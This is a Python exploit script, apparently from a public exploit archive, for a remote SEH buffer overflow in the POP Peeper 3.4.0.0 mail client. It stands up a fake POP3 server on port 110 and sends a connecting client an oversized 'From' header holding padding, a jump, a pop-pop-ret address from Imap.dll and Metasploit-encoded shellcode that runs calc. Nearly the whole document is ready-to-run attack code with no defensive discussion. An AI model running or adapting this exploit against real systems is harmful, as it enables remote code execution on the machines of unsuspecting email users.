POP Peeper 3.4.0.0 (From) Remote Buffer Overflow Exploit (SEH)

#!/usr/bin/python # [+] Bug : POP Peeper 3.4.0.0 (From) Remote Buffer Overflow Exploit (SEH) # [+] Author : His0k4 # [+] Greetings : All friends and muslims HacKerS (DZ) from socket import * import struct # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com shellcode=( \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\" \"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\" \"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\" \"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\" \"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\" \"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x54\\x4e\\x43\\x4b\\x58\\x4e\\x37\" \"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x44\\x4a\\x51\\x4b\\x58\" \"\\x4f\\x55\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x58\\x46\\x43\\x4b\\x38\" \"\\x41\\x30\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x48\\x42\\x4c\" \"\\x46\\x57\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\" \"\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x52\\x46\\x50\\x45\\x47\\x45\\x4e\\x4b\\x38\" \"\\x4f\\x55\\x46\\x42\\x41\\x30\\x4b\\x4e\\x48\\x46\\x4b\\x38\\x4e\\x50\\x4b\\x44\" \"\\x4b\\x48\\x4f\\x55\\x4e\\x51\\x41\\x50\\x4b\\x4e\\x4b\\x38\\x4e\\x31\\x4b\\x48\" \"\\x41\\x50\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x52\\x46\\x30\\x43\\x4c\\x41\\x33\" \"\\x42\\x4c\\x46\\x46\\x4b\\x58\\x42\\x34\\x42\\x43\\x45\\x48\\x42\\x4c\\x4a\\x47\" \"\\x4e\\x30\\x4b\\x48\\x42\\x44\\x4e\\x30\\x4b\\x58\\x42\\x57\\x4e\\x51\\x4d\\x4a\" \"\\x4b\\x48\\x4a\\x46\\x4a\\x30\\x4b\\x4e\\x49\\x30\\x4b\\x48\\x42\\x38\\x42\\x4b\" \"\\x42\\x30\\x42\\x50\\x42\\x50\\x4b\\x38\\x4a\\x46\\x4e\\x53\\x4f\\x45\\x41\\x53\" \"\\x48\\x4f\\x42\\x56\\x48\\x55\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x37\" \"\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x30\\x4f\\x35\\x4a\\x36\\x4a\\x39\" \"\\x50\\x4f\\x4c\\x58\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x46\\x41\\x56\" \"\\x4e\\x36\\x43\\x36\\x42\\x50\\x5a\") junk = \"\\x41\"*1989 payload = \"\\x42\"*352 payload += \"\\xEB\\x10\\x90\\x90\" #jmp+10 (tan9iza ta3 10 mitrate :p) payload += \"\\x4C\\x51\\x01\\x10\" #Universal pop pop ret (Imap.dll) payload += \"\\x90\"*19 #Nops chriki payload += shellcode #calculatrice ta3 100 da :p s = socket(AF_INET, SOCK_STREAM) s.bind((\"0.0.0.0\", 110)) s.listen(1) print \"[*] Listening on [POP3] 110\" c, addr = s.accept() print \"[*] Connection accepted from: %s\" % (addr[0]) c.send(\"+OK\\r\\n\") c.recv(512) c.send(\"+OK\\r\\n\") c.recv(512) c.send(\"+OK\\r\\n\") c.recv(512) c.send(\"+OK 1 100\\r\\n\") c.recv(512) c.send(\"+OK\\r\\n1 root\\r\\n.\\r\\n\") c.recv(512) c.send(\"+OK\\r\\n1 t00r\\r\\n.\\r\\n\") c.recv(512) c.send(\"+OK 100 octets\\r\\n\") c.send(\"To: \"+junk+\"\\r\\n.\\r\\n\") c.send(\"From: \"+payload+\"\\r\\n.\\r\\n\") c.send(\"Subject: \"+junk+\"\\r\\n.\\r\\n\") c.send(\"Date: today\\r\\n.\\r\\n\") c.send(\"Content-Type: \"+junk+\"; charset=UTF-7\\r\\n.\\r\\n\") raw_input(\"[*] Payload sended!\\nPress key to quit\") c.close() s.close()